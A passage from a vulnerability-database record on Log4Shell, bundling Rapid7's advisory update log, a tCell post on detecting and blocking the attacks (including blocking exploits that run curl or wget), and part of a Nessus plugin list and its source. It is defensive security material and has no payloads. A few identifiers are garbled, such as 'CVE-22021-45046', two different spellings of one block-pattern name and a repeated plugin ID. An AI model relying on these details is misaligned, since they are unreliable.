vulnerable to Log4j CVE-2021-44228; \ngiven the default static content, basically all Struts implementations should be trivially vulnerable. Rapid7's vulnerability research team has technical analysis, a simple proof-of-concept, and an example log artifact [available in AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>).\n\n[December 12, 2021, 2:20pm ET] \nInsightVM and Nexpose customers can now assess their exposure to CVE-2021-44228 with an authenticated vulnerability check. Note that this check requires that customers update their product version and restart their console and engine. See the `Rapid7 customers` section for details.\n\n[December 13, 2021, 10:30am ET] \nUpdated mitigations section to include new guidance from Apache Log4J team and information on how to use InsightCloudSec + InsightVM to help identify vulnerable instances.\n\n[December 13, 2021, 2:40pm ET] \nRapid7 researchers have confirmed and demonstrated that essentially all vCenter Server instances are trivially exploitable by a remote, unauthenticated attacker. Technical analysis, proof-of-concept code, and indicators of compromise for this vector are [available in AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>).\n\n[December 13, 2021, 4:00pm ET] \ntCell customers can now view events for log4shell attacks in the App Firewall feature. Additionally, customers can set a block rule leveraging the default tc-cdmi-4 pattern.\n\n[December 13, 2021, 6:00pm ET] \nWe received some reports of the remote check for InsightVM not being installed correctly when customers were taking in content updates. Product version 6.6.119 was released on December 13, 2021 at 6pm ET to ensure the remote check for CVE-2021-44228 is available and functional. Customers will need to update and restart their Scan Engines/Consoles.\n\n[December 13, 2021, 8:15pm ET] \nInformation on Rapid7's response to Log4Shell and the vulnerability's impact to Rapid7 solutions and systems is [now available here](<https://www.rapid7.com/blog/post/2021/12/14/update-on-log4shells-impact-on-rapid7-solutions-and-systems/>).\n\n[December 14, 2021, 08:30 ET] \nApache has released [Log4j 2.16](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>). This disables the Java Naming and Directory Interface (JNDI) by default and requires `log4j2.enableJndi` to be set to true to allow JNDI. It also completely removes support for Message Lookups, a process that was started with the prior update. It mitigates the weaknesses identified in the newly released [CVE-22021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>).\n\nRapid7 has posted resources to assist InsightVM and Nexpose customers in scanning for this vulnerability. [This post](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>), \u201cUsing InsightVM to Find Apache Log4j CVE-2021-44228\u201d goes into detail on how the scans work and includes a SQL query for reporting. For product help, we have added [documentation](<https://docs.rapid7.com/insightvm/apache-log4j/>) on step-by-step information to scan and report on this vulnerability.\n\n[December 14, 2021, 2:30 ET] \nAlong with Log4Shell, we also have [CVE-2021-4104](<https://access.redhat.com/security/cve/CVE-2021-4104>) \u2014 reported on December 9, 2021 \u2014 a flaw in the Java logging library Apache Log4j in version 1.x. JMSAppender that is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker's JMS Broker. Note this flaw only affects applications which are specifically configured to use JMSAppender, which is not the default, or when the attacker has write-access to the Log4j configuration for adding JMSAppender to the attacker's JMS Broker.\n\n[December 14, 2021, 3:30 ET] \nCISA has [posted a dedicated resource page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for Log4j info aimed mostly at Federal agencies, but consolidates and contains information that will be used to protectors in any organization.\n\nRapid7 Labs is now maintaing a [regularly updated list of unique Log4Shell exploit strings](<https://github.com/rapid7/data/blob/master/log4shell/heisenberg/exploit-strings.txt>) as seen by Rapid7's Project Heisenberg.\n\n[December 14, 2021, 4:30 ET] \nAdded a section (above) on what our IntSights team is seeing in criminal forums on the Log4Shell exploit vector.\n\n[December 15, 2021, 09:10 ET] \nAdded a new section to track active attacks and campaigns. See above for details on a new ransomware family incorporating Log4Shell into their repertoire.\n\n[December 15, 2021, 10:00 ET] \nAlong with the guidance below, our tCell team has a new, [longer blog post](<https://www.rapid7.com/blog/post/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/>) on these detections and how to use them to safeguard your applications.\n\n[December 15, 2021 6:30 PM ET] \nApache has fixed an additional vulnerability, CVE-2021-45046, in Log4j version 2.16.0 to address an incomplete fix for CVE-2021-44228 in certain non-default configurations. Apache's security bulletin now advises users that they must upgrade to 2.16.0 to fully mitigate CVE-2021-44228. InsightVM and Nexpose customers can assess their exposure to CVE-2021-45046 with an authenticated (Linux) check.\n\nApache also appears to have updated their advisory with information on a separate version stream of Log4j vulnerable to CVE-2021-44228. They have issued a fix for the vulnerability in version 2.12.2 as well as 2.16.0. We are investigating the feasibility of InsightVM and Nexpose coverage for this additional version stream.\n\nVersion 6.6.120 of the Scan Engine and Console is now available to InsightVM and Nexpose customers and includes improvements to the authenticated Linux check for CVE-2021-44228.\n\n[December 17, 2021 09:30 ET] \nAn &quot;external resources&quot; section has been added that includes non-Rapid7 resources on Log4j/Log4Shell that may be of use to customers and the community.\n\nCVE-2021-45046 has been escalated from a CVSS score of 3.7 to 9.0 on the [Apache Foundation website](<https://logging.apache.org/log4j/2.x/security.html>). The vulnerability was designated when it became clear that the fix for CVE-2021-44228 was \u201cincomplete in certain non-default configurations'' and has now been upgraded in severity due to reports that it not only allows for DoS attacks, but also information leaks and in some specific cases, RCE (currently being [reported for macOS](<https://twitter.com/GossiTheDog/status/1471791074314276867?s=20>)). No in-the-wild-exploitation of this RCE is currently being publicly reported. The fix for this is the [Log4j 2.16](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>) update released on December 13. If you have not upgraded to this version, we strongly recommend you do so, though we note that if you are on v2.15 (the original fix released by Apache), you will be covered in most scenarios. Update to 2.16 when you can, but don\u2019t panic that you have no coverage. \nCVE-2021-45046 is an issue in situations when a logging configuration uses a non-default Pattern Layout with a Context Lookup. In this case, attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern.\n\n[December 17, 12:15 PM ET] \nStarting in version 6.6.121 released December 17, 2021, we have updated product functionality to allow InsightVM and Nexpose customers to scan for the Apache Log4j (Log4Shell) vulnerability on Windows devices with the authenticated check for CVE-2021-44228. This update now gives customers the option to enable Windows File System Search to allow scan engines to search all local file systems for specific files on Windows assets. Customers should ensure they are running version 6.6.121 of their Scan Engines and Consoles and enable Windows File System Search in the scan template. The update to 6.6.121 requires a restart.\n\nNote: Searching entire file systems across Windows assets is an intensive process that may increase scan time and resource utilization. To allow this, you can enable Windows file system searching in the scan template in order to use the authenticated check for Log4j on Windows systems.\n\nIn some cases, customers who have enabled the \u201cSkip checks performed by the Agent\u201d option in the scan template may see that the Scan Engine has skipped authenticated vulnerability checks. If you have the Insight Agent running in your environment, you can uncheck \u201cSkip checks performed by the Agent\u201d option in the scan template to ensure that authenticated checks run on Windows systems.\n\n[December 17, 4:50 PM ET] \nInsight Agent collection on Windows for Log4j has begun rolling out in version 3.1.2.38 as of December 17, 2021. It will take several days for this roll-out to complete. If you are using the Insight Agent to assess your assets for vulnerabilities and you are not yet on version 3.1.2.38, you can uncheck the \u201c[Skip checks performed by the Agent](<https://docs.rapid7.com/insightvm/enable-complementary-scanning-for-scan-engines-and-insight-agents/>)\u201d option in the scan template to ensure that authenticated checks run on Windows systems.\n\nRead more about scanning for Log4Shell [here](<https://docs.rapid7.com/insightvm/apache-log4j/>).\n\n[December 17, 2021, 6 PM ET] \nReports are coming in of ransomware group, Conti, leveraging CVE-2021-44228 (Log4Shell) to mount attacks. According to a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) from AdvIntel, the group is testing exploitation by targeting vulnerable Log4j2 instances in VMware vCenter \u201cfor lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.\u201d Expect more widespread ransom-based exploitation to follow in coming weeks.\n\n[December 20, 2021 8:50 AM ET] \nAdded an entry in &quot;External Resources&quot; to [CISA's maintained list of affected products/services](<https://github.com/cisagov/log4j-affected-db>).\n\n[December 20, 2021 1:30 PM ET] \nInsightVM and Nexpose customers can assess their exposure to CVE-2021-45105 as of December 20, 2021 with an authenticated vulnerability check. CVE-2021-45105 is a Denial of Service (DoS) vulnerability that was fixed in Log4j version 2.17.0. Our check for this vulnerability is supported in on-premise and agent scans (including for Windows). \nContent update: `ContentOnly-content-1.1.2361-202112201646` \nJarID: 3961186789\n\nPlease note that Apache's guidance as of December 17, 2021 is to update to version 2.17.0 of Log4j. While this is good guidance, given the severity of the original CVE-2021-44228, **organizations should prioritize ensuring all Log4j versions have been updated to at least 2.16.0.**\n\n[December 22, 2021] \nRapid7 has released a new Out of Band Injection Attack template to test for Log4Shell in InsightAppSec. Learn more about the details [here](<https://www.rapid7.com/blog/post/2021/12/22/test-for-log4shell-with-insightappsec-using-new-functionality/>).\n\n[December 23, 2021] \nApache has released Log4j 2.12.3 for Java 7 users and 2.3.1 for Java 6 users to mitigate Log4Shell-related vulnerabilities. Notably, both Java 6 and Java 7 are end-of-life (EOL) and unsupported; we strongly recommend upgrading to Java 8 or later. If you cannot update to a supported version of Java, you should ensure you are running Log4j 2.12.3 or 2.3.1.\n\n[December 28, 2021] \nApache has [released](<https://logging.apache.org/log4j/2.x/security.html>) Log4j versions 2.17.1 (Java 8), 2.12.4 (Java 7), and 2.3.2 (Java 6) to mitigate a new vulnerability. CVE-2021-44832 is of moderate severity (CVSSv3 6.6) and exists only in a non-default configuration that requires the attacker to have control over Log4j configuration. **This is an extremely unlikely scenario.** Applications do not, as a rule, allow remote attackers to modify their logging configuration files. While keeping up-to-date on Log4j versions is a good strategy in general, organizations should not let undue hype on CVE-2021-44832 derail their progress on mitigating the real risk by ensuring CVE-2021-44228 is fully remediated.\n\n[January 3, 2022] \nInsightVM and Nexpose customers can assess their exposure to Log4j CVE-2021-44832 with an [authenticated vulnerability check](<https://www.rapid7.com/db/vulnerabilities/apache-log4j-core-cve-2021-44832/>) as of December 31, 2021. Please note that as we emphasized above, organizations should not let this new CVE, which is significantly overhyped, derail progress on mitigating CVE-2021-44228.\n\n \n\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T15:30:00", "type": "rapid7blog", "title": "Widespread Exploitation of Critical Remote Code Execution in Apache Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-10T15:30:00", "id": "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "href": "https://blog.rapid7.com/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-20T21:04:01", "description": "\n\nBy now, we\u2019re sure you\u2019re familiar with all things [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) \u2013 but we want to make sure we share how to protect your applications. Applications are a critical part of any organization\u2019s attack surface, and we\u2019re seeing thousands of Log4Shell attack attempts in our customers' environments every hour. Let\u2019s walk through the various ways [tCell](<https://www.rapid7.com/products/tcell/>) can help our customers protect against Log4Shell attacks.\n\n## 1\\. Monitor for any Log4Shell attack attempts\n\ntCell is a web application and API protection solution that has traditional web application firewall monitoring capabilities such as monitoring attacks. Over the weekend, we launched a new App Firewall detection for all tCell customers. This means tCell customers can leverage our App Firewall functionality to determine if any Log4Shell attack attempts have taken place. From there, customers can also drill in to more information on the events that took place. We\u2019ve created a video to walk you through how to detect Log4Shell attack attempts using the App Firewall feature in tCell.\n\n\n\nAs a reminder, customers will need to make sure they have deployed the JVM agent on their apps to begin monitoring their applications\u2019 activity. Make sure to check out our [Quick Start Guide](<https://docs.rapid7.com/tcell/quick-start-guide>) if you need help setting up tCell. \n\n\n## 2\\. Block against Log4Shell attacks \n\n\nMonitoring is great, but what you may be looking for is something that protects your application by blocking Log4Shell attack attempts. In order to do this, we\u2019ve added a default pattern (**tc-cmdi-4**) for customers to block against. Below is a video on how to set up this custom block rule, or reach out to the tCell team if you need any assistance rolling this out at large.\n\n\n\nAs research continues and new patterns are identified, we will provide updates to** tc-cdmi-4 **to improve coverage. Customers have already noted how the new default pattern is providing more protection coverage than yesterday. \n\n\n## 3\\. Identify vulnerable packages_ _(such as CVE 2021-44228)\n\n \nWe\u2019ve heard from customers that they\u2019re unsure of whether or not their applications are leveraging the vulnerable package. With tCell, we will alert you if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as [**CVE 2021-44228**](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) and [**CVE 2021-45046**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)) are loaded by the application at runtime. The best way to eliminate the risk exposure for Log4Shell is to upgrade any vulnerable packages to 2.17. Check out the video below for more information.\n\n\n\n \nIf you would like to provide additional checks outside of the vulnerable packages check at runtime, please refer to our blog on how [InsightVM can help you do this](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>). \n\n\n## 4\\. Enable OS commands\n\nOne of the benefits of using tCell\u2019s app server agents is the fact that you can enable blocking for [OS commands](<https://docs.rapid7.com/tcell/os-commands>). This will prevent a wide range of exploits leveraging things like curl, wget, etc. Below you\u2019ll find a picture of how to enable OS commands (either report only or block and report).\n\n\n\n## 5\\. Detect and block suspicious actors \n\nAll events that are detected by the App Firewall in tCell are fed into the analytics engine to determine [Suspicious Actors](<https://docs.rapid7.com/tcell/sql-injection/>). The Suspicious Actors feature takes in multiple inputs (such as failed logins, injections, unusual inputs, etc.) and correlates these to an IP address.\n\n\n\nNot only can you monitor for suspicious actors with tCell, but you can also configure tCell to block all activity or just the suspicious activity from the malicious actor\u2019s IP.\n\n\n\n## All the components together make the magic happen\n\nThe power of tCell isn\u2019t in one or two features, but rather its robust capability set, which we believe is required to secure any environment with a defense-in-depth approach. We will help customers not only identify vulnerable Log4j packages that are being used, but also assist with monitoring for suspicious activity and block attacks. The best security is when you have multiple types of defenses available to protect against bad actors, and this is why using the capabilities mentioned here will prove to be valuable in protecting against Log4Shell and future threats.\n\n#### Get more critical insights about defending against Log4Shell\n\n[Check out our resource center](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T14:58:14", "type": "rapid7blog", "title": "How to Protect Your Applications Against Log4Shell With tCell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-15T14:58:14", "id": "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "href": "https://blog.rapid7.com/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-03-17T17:41:15", "description": "This plugin was used in the scan template 'Log4Shell Vulnerability Ecosystem' (prior to 2/2/2022) as a way to include other plugins related to the Log4j vulnerabilities CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, and CVE-2021-4104, including those based on patches from other vendors.\n - 156932 VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\n - 156054 Ubuntu 18.04 LTS / 20.04 LTS : Apache Log4j 2 vulnerability (USN-5192-1)\n - 156026 FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)\n - 156115 Apache Log4Shell RCE detection via callback correlation (Direct Check FTP)\n - 156558 Apache JSPWiki Log4Shell Direct Check (CVE-2021-44228)\n - 156327 Apache Log4j 2.0 < 2.3.2 / 2.4 < 2.12.4 / 2.13 < 2.17.1 RCE\n - 156232 Apache Log4Shell RCE detection via callback correlation (Direct Check SMB)\n - 156157 Apache Log4Shell RCE detection via callback correlation (Direct Check POP3)\n - 156132 Apache Log4Shell RCE detection via callback correlation (Direct Check SMTP)\n - 156018 Debian DLA-2842-1 : apache-log4j2 - LTS security update\n - 156161 Ubuntu 16.04 LTS : Apache Log4j 2 vulnerability (USN-5192-2)\n - 156032 Log4j EOL / Unsupported Apache Log4j Unsupported Version Detection\n - 156157 Apache Log4Shell RCE detection via callback correlation (Direct Check IMAP)\n - 156941 MobileIron Core Log4Shell Direct Check (CVE-2021-44228)\n - 156258 Apache Log4Shell RCE detection via callback correlation (Direct Check NTP)\n - 156016 Apache Log4Shell RCE detection via Path Enumeration (Direct Check HTTP)\n - 156871 Amazon Linux AMI : log4j (ALAS-2022-1562)\n - 156182 Amazon Linux 2 : java-17-amazon-corretto, java-11-amazon-corretto, java-1.8.0-openjdk, java-1.7.0-openjdk (ALAS-2021-1731)\n - 156166 Apache Log4Shell RCE detection via callback correlation (Direct Check SSH)\n - 156375 Apache Log4Shell RCE detection via callback correlation (Direct Check UPnP)\n - 156139 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4107-1)\n - 157137 Oracle Linux 6 : log4j (ELSA-2022-9056)\n - 156197 Apache Log4Shell RCE detection via callback correlation (Direct Check NetBIOS)\n - 156015 Debian DSA-5020-1 : apache-log4j2 - security update\n - 156169 SUSE SLES15 Security Update : log4j (SUSE-SU-2021:4111-1)\n - 156559 Apache Log4Shell RCE detection via callback correlation (Direct Check RPCBIND)\n - 156218 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1601-1)\n - 156112 Amazon Linux 2 : aws-kinesis-agent (ALAS-2021-1730)\n - 156014 Apache Log4Shell RCE detection via callback correlation (Direct Check HTTP)\n - 156174 Amazon Linux AMI : java-1.8.0-openjdk, java-1.7.0-openjdk, java-1.6.0-openjdk (ALAS-2021-1553)\n - 156164 Apache Log4Shell CVE-2021-45046 Bypass Remote Code Execution\n - 156052 FreeBSD : bastillion -- log4j vulnerability (515df85a-5cd7-11ec-a16d-001517a2e1a4)\n - 156257 Apache Log4Shell RCE detection via callback correlation (Direct Check DNS)\n - 156455 Apache Log4Shell RCE detection via callback correlation (Direct Check PPTP)\n - 156002 Apache Log4j < 2.15.0 Remote Code Execution\n - 156158 Apache Log4Shell RCE detection via callback correlation (Direct Check Telnet)\n - 156669 Apache Log4Shell RCE detection via callback correlation (Direct Check MSRPC)\n - 156324 FreeBSD : OpenSearch -- Log4Shell (b0f49cb9-6736-11ec-9eea-589cfc007716)\n - 156078 FreeBSD : serviio -- affected by log4j vulnerability (1ea05bb8-5d74-11ec-bb1e-001517a2e1a4)\n - 156560 VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\n - 156473 Apache OFBiz Log4Shell Direct Check (CVE-2021-44228)\n - 156146 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)\n - 156124 Debian DSA-5022-1 : apache-log4j2 - security update\n - 156177 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4111-1)\n - 157159 Oracle Linux 8 : parfait:0.5 (ELSA-2022-0290)\n - 156145 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:3999-1)\n - 156256 Apache Log4Shell RCE detection via callback correlation (Direct Check SNMP)\n - 156172 SUSE SLED15 / SLES15 Security Update : log4j12 (SUSE-SU-2021:4112-1)\n - 156276 openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:1612-1)\n - 156181 openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:4112-1)\n - 156103 Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)\n - 156165 Apache Log4j 2.x < 2.16.0 RCE (MacOS)\n - 156210 FreeBSD : graylog -- remote code execution in log4j from user-controlled log input (650734b2-7665-4170-9a0a-eeced5e10a5e)\n - 156035 VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\n - 156183 Apache Log4j 2.x < 2.17.0 DoS\n - 156104 Ubuntu 20.04 LTS : Apache Log4j 2 vulnerability (USN-5197-1)\n - 156441 Ubiquiti UniFi Network Log4Shell Direct Check (CVE-2021-44228)\n - 156891 Oracle Primavera P6 Enterprise Project Portfolio Management (Jan 2022 CPU)\n - 156753 Apache Druid Log4Shell Direct Check (CVE-2021-44228)\n - 156175 Amazon Linux 2 : java-1.8.0-amazon-corretto (ALAS-2021-001)\n - 156712 Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 : Apache Log4j 1.2 vulnerability (USN-5223-1)\n - 156000 Apache Log4j Installed (Unix)\n - 156167 SUSE SLES11 Security Update : log4j (SUSE-SU-2021:14866-1)\n - 156056 Apache Log4Shell RCE detection via Raw Socket Logging (Direct Check)\n - 156021 FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\n - 156153 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4094-1)\n - 156893 Oracle Primavera Gateway (Jan 2022 CPU)\n - 156471 Apache Solr Log4Shell Direct Check (CVE-2021-44228)\n - 156340 openSUSE 15 Security Update : kafka (openSUSE-SU-2021:1631-1)\n - 156150 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1)\n - 156180 openSUSE 15 Security Update : logback (openSUSE-SU-2021:4109-1)\n - 156264 Amazon Linux AMI : log4j-cve-2021-44228-hotpatch (ALAS-2021-1554)\n - 156170 SUSE SLED12 / SLES12 Security Update : log4j (SUSE-SU-2021:4115-1)\n - 155999 Apache Log4j < 2.15.0 Remote Code Execution\n - 156206 Oracle Linux 7 : log4j (ELSA-2021-5206)\n - 156001 Apache Log4j JAR Detection (Windows)\n - 155998 Apache Log4j Message Lookup Substitution RCE (Log4Shell) (Direct Check)\n - 156057 Apache Log4j 2.x < 2.16.0 RCE\n - 156279 openSUSE 15 Security Update : logback (openSUSE-SU-2021:1613-1)\n - 156017 SIP Script Remote Command Execution via log4shell", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "Log4Shell Ecosystem Wrapper", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45056"], "modified": "2022-02-02T00:00:00", "cpe": [], "id": "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "href": "https://www.tenable.com/plugins/nessus/156061", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nvar script_names_filenames = {\n \"155998 Apache Log4j Message Lookup Substitution RCE (Log4Shell) (Direct Check)\": \"apache_log4j_jdni_ldap_generic.nbin\",\n \"155999 Apache Log4j < 2.15.0 Remote Code Execution\": \"apache_log4j_2_15_0.nasl\",\n \"156000 Apache Log4j Installed (Unix)\": \"apache_log4j_nix_installed.nbin\",\n \"156001 Apache Log4j JAR Detection (Windows)\": \"apache_log4j_win_installed.nbin\",\n \"156002 Apache Log4j < 2.15.0 Remote Code Execution\": \"apache_log4j_win_2_15_0.nasl\",\n \"156014 Apache Log4Shell RCE detection via callback correlation (Direct Check HTTP)\": \"apache_log4j_jdni_ldap_generic_http_headers.nbin\",\n \"156017 SIP Script Remote Command Execution via log4shell\": \"log4j_log4shell_sip_invite.nbin\",\n \"156016 Apache Log4Shell RCE detection via Path Enumeration (Direct Check HTTP)\": \"log4j_log4shell_www.nbin\",\n \"156035 VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\": \"vmware_vcenter_log4shell.nbin\",\n \"156032 Log4j EOL / Unsupported Apache Log4j Unsupported Version Detection\": \"apache_log4j_unsupported.nasl\",\n \"156056 Apache Log4Shell RCE detection via Raw Socket Logging (Direct Check)\": \"apache_log4j_jndi_ldap_generic_raw.nbin\",\n \"156057 Apache Log4j 2.x < 2.16.0 RCE\": \"apache_log4j_2_16_0.nasl\",\n \"156103 Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)\": \"apache_log4j_1_2.nasl\",\n \"156157 Apache Log4Shell RCE detection via callback correlation (Direct Check POP3)\": \"apache_log4j_jdni_ldap_generic_telnet.nbin\",\n \"156157 Apache Log4Shell RCE detection via callback correlation (Direct Check IMAP)\": \"apache_log4shell_pop3.nbin\",\n \"156158 Apache Log4Shell RCE detection via callback correlation (Direct Check Telnet)\": \"apache_log4shell_imap.nbin\",\n \"156132 Apache Log4Shell RCE detection via callback correlation (Direct Check SMTP)\": \"apache_log4shell_smtp.nbin\",\n \"156164 Apache Log4Shell CVE-2021-45046 Bypass Remote Code Execution\": \"apache_log4shell_CVE-2021-45056_direct_check.nbin\",\n \"156112 Amazon Linux 2 : aws-kinesis-agent (ALAS-2021-1730)\": \"al2_ALAS-2021-1730.nasl\",\n \"156124 Debian DSA-5022-1 : apache-log4j2 - security update\": \"debian_DSA-5022.nasl\",\n \"156104 Ubuntu 20.04 LTS : Apache Log4j 2 vulnerability (USN-5197-1)\": \"ubuntu_USN-5197-1.nasl\",\n \"156018 Debian DLA-2842-1 : apache-log4j2 - LTS security update\": \"debian_DLA-2842.nasl\",\n \"156015 Debian DSA-5020-1 : apache-log4j2 - security update\": \"debian_DSA-5020.nasl\",\n \"156021 FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\": \"freebsd_pkg_3fadd7e4f8fb45a0a2188fd6423c338f.nasl\",\n \"156026 FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)\": \"freebsd_pkg_4b1ac5a35bd411ec8602589cfc007716.nasl\",\n \"156078 FreeBSD : serviio -- affected by log4j vulnerability (1ea05bb8-5d74-11ec-bb1e-001517a2e1a4)\": \"freebsd_pkg_1ea05bb85d7411ecbb1e001517a2e1a4.nasl\",\n \"156054 Ubuntu 18.04 LTS / 20.04 LTS : Apache Log4j 2 vulnerability (USN-5192-1)\": \"ubuntu_USN-5192-1.nasl\",\n \"156052 FreeBSD : bastillion -- log4j vulnerability (515df85a-5cd7-11ec-a16d-001517a2e1a4)\": \"freebsd_pkg_515df85a5cd711eca16d001517a2e1a4.nasl\",\n \"156115 Apache Log4Shell RCE detection via callback correlation (Direct Check FTP)\": \"log4j_log4shell_ftp.nbin\",\n \"156166 Apache Log4Shell RCE detection via callback correlation (Direct Check SSH)\": \"apache_log4shell_ssh.nbin\",\n \"156153 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4094-1)\": \"openSUSE-2021-4094.nasl\",\n \"156139 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4107-1)\": \"openSUSE-2021-4107.nasl\",\n \"156165 Apache Log4j 2.x < 2.16.0 RCE (MacOS)\": \"apache_log4j_2_16_0_mac.nasl\",\n \"156146 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)\": \"openSUSE-2021-1577.nasl\",\n \"156150 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1)\": \"openSUSE-2021-1586.nasl\",\n \"156145 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:3999-1)\": \"openSUSE-2021-3999.nasl\",\n \"156161 Ubuntu 16.04 LTS : Apache Log4j 2 vulnerability (USN-5192-2)\": \"ubuntu_USN-5192-2.nasl\",\n \"156183 Apache Log4j 2.x < 2.17.0 DoS\": \"apache_log4j_2_17_0.nasl\",\n \"156175 Amazon Linux 2 : java-1.8.0-amazon-corretto (ALAS-2021-001)\": \"al2_ALAS-2021-001.nasl\",\n \"156174 Amazon Linux AMI : java-1.8.0-openjdk, java-1.7.0-openjdk, java-1.6.0-openjdk (ALAS-2021-1553)\": \"ala_ALAS-2021-1553.nasl\",\n \"156182 Amazon Linux 2 : java-17-amazon-corretto, java-11-amazon-corretto, java-1.8.0-openjdk, java-1.7.0-openjdk (ALAS-2021-1731)\": \"al2_ALAS-2021-1731.nasl\",\n \"156180 